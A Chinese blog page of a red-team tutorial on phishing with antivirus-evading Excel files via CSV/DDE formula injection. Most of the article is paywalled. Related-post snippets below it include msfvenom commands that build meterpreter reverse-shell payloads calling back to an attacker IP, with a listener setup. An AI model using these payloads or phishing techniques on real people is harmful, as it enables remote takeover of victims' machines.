浅谈钓鱼攻防之道-制作免杀excel文件钓鱼

已于 2025-04-14 09:47:22 修改
阅读量1.2k 收藏 17
点赞数 27
分类专栏: 0.红队攻防 # 5.钓鱼攻防 # 4.免杀攻防 文章标签: excel 安全攻防
于 2024-10-25 18:05:13 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_48899364/article/details/143238172
版权

如果我告诉你我很厉害,也许你会说我在吹牛。但是如果我告诉你我并不厉害,你肯定知道我在撒谎。

1、CSV注入之RCE

CSV公式注入(CSV Injection)是一种会造成巨大影响的攻击向量,攻击这可以向Excel文件中注入可以输出或以CSV文件读取的恶意攻击载荷,当用户打开Excel文件时,文件会从CSV描述转变为原始的Excel格式,包括Excel提供的所有动态功能,在这个过程中,CSV中的所有Excel公式都会执行,当该函数有合法意图时,很易被滥用并允许恶意代码执行。

在Office的"文件->选项->信任中心"处开启"启用动态数据交换服务器启动"功能:

在这里插入图片描述

之后构造以下恶意载荷:

在这里插入图片描述

之后模拟用户打开Excel文件:点击更新

了解本专栏 订阅专栏 解锁全文 超级会员免费看
浅谈红队攻防-CobaltStrike钓鱼攻击集锦
平凡
08-23 1660
只有需要闹钟,持续不断地提醒着、坚持着,才能最终将所有人唤醒啊。
[网络安全自学篇] 九十.远控木马详解及APT攻击中的远控和防御
热门推荐
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享远控木马及APT攻击中的远控,包括木马的基本概念和分类、木马的植入方式、远控木马的通信方式、APT攻击与远控木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解远控型木马,基础性文章,希望对您有所帮助~
Excel-Phish:网络钓鱼密码保护的Excel文件
04-24
Excel钓鱼 网络钓鱼密码保护的Excel文件-由和。 相应的博客文章可以在这里找到:
Excel的IYQ钓鱼
dda6607的博客
05-20 2381
Excel的IYQ钓鱼 0x00 环境准备 操作系统:windows7 microsoft office版本:office 2010 0x01 了解IYQ的基本概念 可以将IYQ简单的理解成内置在excel中的一种特殊‘web浏览器’(不能加载脚本),通过IQY【即web查询】语句,可以直接将各类web上的列表数据轻松引入到当前的excel中,而正是因为这样,从而给了我们利用e...
php 调用 excel 宏_原创干货 | excel钓鱼简介
weixin_39663729的博客
12-06 695
点击关注了解更多精彩内容!!excel钓鱼简介关于excel钓鱼是由来已久的一种攻击方式,目前本人已知的方法有:office宏攻击DDE攻击power query DDE(DDE的一种)office宏攻击宏攻击,一种古老的攻击手法,依靠在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的宏攻击。然后按照步骤加入宏,用户在启用宏的情况下即可顺利上线。DDE...
常见的钓鱼招式,可千万别入坑哦
HBohan的博客
10-19 500
OFFICE 【查看资料】 Office安全保护机制 受保护的视图 为了保护计算机不受office病毒侵害,微软设计了一个收保护视图,将所有可疑的office文件以只读方式打开,在该模式下多数编辑功能被禁用。文件呗以受保护视图打开的情况有如下几种 文件是从 Internet 位置打开的 文件是通过 Outlook 附件的方式接收的,并且计算机策略将发件人定义为不安全 文件是从不安全的位置打开的 文件文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDr.
社会工程学之钓鱼attack常见手段和方法
weixin_51339377的博客
03-27 1432
1.excel钓鱼 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.186 lport=4444 -f msi -o hack.msi msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost=192.168.1.186 show options exploit 将msi粘贴到/var/www/htm..
安全红蓝对抗反制(反捕、画像)
墨痕诉清风的博客
03-09 3841
1.蜜罐 蜜罐可以理解成互联网上的一台主机,它的作用是诱骗攻击者去对自己进行攻击,然后记录攻击者的攻击细节并生成对应的攻击者画像,是当前的一种比较主流的入侵检测系统也是一种主动防御系统。 1.1 放置高交互蜜罐 放置高交互蜜罐,例如一个邮箱服务类型的蜜罐,攻击者有可能会进行邮箱注册,这样子攻击者就主动向我们留下了自己的身份信息。 1.2 放置多个容易被发现的蜜罐 放置多个攻击者可以轻而易举发现的蜜罐,攻击者就会知自己所在的环境是被蜜罐所包围的,有可能就会放弃进行大范围攻击,变相保护了蜜罐背后的真
社会工程学钓鱼样本的制作
m0_72482018的博客
12-09 301
msfvenom -p windows/x64/meterpreter/reverse_tcp lhsot=kali的ip lport=监听的端口 -f msi -o diaoyexl.msi。msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=kali的ip LPORT=监听端口 -f exe -o flash.exe。这里解压前运行的是恶意远控木马,解压后运行的是正常的flash程序。然后python在具有恶意的msi的文件夹下开启http服务。
社工 钓鱼样本制作
2301_79621164的博客
08-26 883
靶机:32位windows7攻击机:kali。
153-钓鱼篇&Office宏对象&LNK快捷方式&CHK电子书&上线方案
DamnVanish的博客
09-18 1316
Office宏对象&LNK快捷方式&CHK电子书的钓鱼方式以及的思路讲解
钓鱼的常见几种方式
qq_55894976的博客
08-20 1304
【代码】钓鱼的常见几种方式。
从SSRF到RCE:微软不打算修复Office Online Server 中的这个漏洞
smellycat000的专栏
10-21 624
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士安全研究员表示,运行Microsoft Offine Online Server 的Windows 服务器可被用于实现服务器端请求伪造 (SSRF),并在主机上实现远程代码执行后果。MDSec 公司的安全研究员表示,已将自己的研究成果通知给微软安全响应中心,但被告知该行为并非漏洞,而是Office Online Server的一个特性,因此将不会...
csv注入文件
HoAd'blog
08-06 774
攻击者通过在CSV文件中构造恶意的命令或函数,使得正常用户在使用Excel打开这个CSV文件后恶意的命令或函数被执行,从而造成攻击行为。 原因 1、CSV文件中的几个特殊符号“+、-、@、=” 尝试在CSV单元格中输入“=1+1”,回车后,发现单元格的值变成了2,说明加号被当做运算执行了。 除了加号,“-”、“@”、“=”也会被解释为公式。 2、DDE(Dynamic Data Exchange) DDE是Windows下进程间通信协议,是一种动态数据交换机制,使用DDE通讯需要两个Windows应用程序,
Linux 的编辑器--vim
2401_83191546的博客
05-25 1980
本文介绍了Vim编辑器的基本使用与高级配置。主要内容包括:1)Vim与Vi的区别,Vim是Vi的升级版,支持语法高亮和多平台运行;2)Vim的三种基本模式(命令、插入、底行模式)及其切换方法;3)常用操作命令如光标移动、文本编辑、复制粘贴等;4)末行模式功能如查找替换、保存退出;5)批量注释技巧;6)针对C/C++开发的专业配置方案,包括插件管理、代码补全、调试工具等。通过系统配置,可将Vim打造成高效的编程IDE环境。
java-springboot文件上传校验之只允许上传excel文件,且检查不能是脚本或者有害文件或可行性文件
最新发布
weixin_46528266的博客
06-03 286
java-springboot文件上传校验之只允许上传excel文件,且检查不能是脚本或者有害文件或可行性文件
纯html,js创建一个类似excel的表格
全粘工程师
05-29 434
摘要:该系统为基于PHP的员工绩效管理平台,支持数据增删改查操作。主要功能包括:1)员工绩效数据表格化管理,支持按年月查询;2)动态添加/删除员工记录;3)积分
TomatoSCI分析日记:数据分析为什么用csv不用excel
qq_44684643的博客
05-31 643
当我们把两种文件内的字体颜色改变并保存(图1A,左为excel,右为csv),再打开的时候可以看到csv依然是最简朴的形式(图1B,左为excel,右为csv)。一份人畜无害的数据(图2A),但是分析时就是不停报错,但是把excel/csv文件都翻了给遍都没找到问题,但是这个时候我们用记事本打开csv文件我们可以发现最后两列是空列(图2B),这个时候我们再回头用excel打开把最后两列空列删除即可。其实并不是多余,虽然看到的内容是一样的,但是相比excel文件csv文件没这么多繁文缛节,效率更高。
python批量解析提取word内容到excel
weixin_47233946的博客
05-31 724
本文介绍了一种基于Python实现Word文档批量提取内容并自动存储到Excel的方法。通过python-docx和openpyxl等库,实现了从指定目录读取.docx文件、解析文本段落和表格数据、结构化整理后导出到Excel的完整流程。文中详细展示了环境配置、核心代码实现及高级处理技巧,包括多线程加速、样式文本提取等功能。该方案解决了传统手工处理效率低下的问题,能高效完成数百文档的批量操作,支持扩展以适应不同文档模板需求。注意事项包括文件编码统一、异常处理和分批写入等优化建议。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值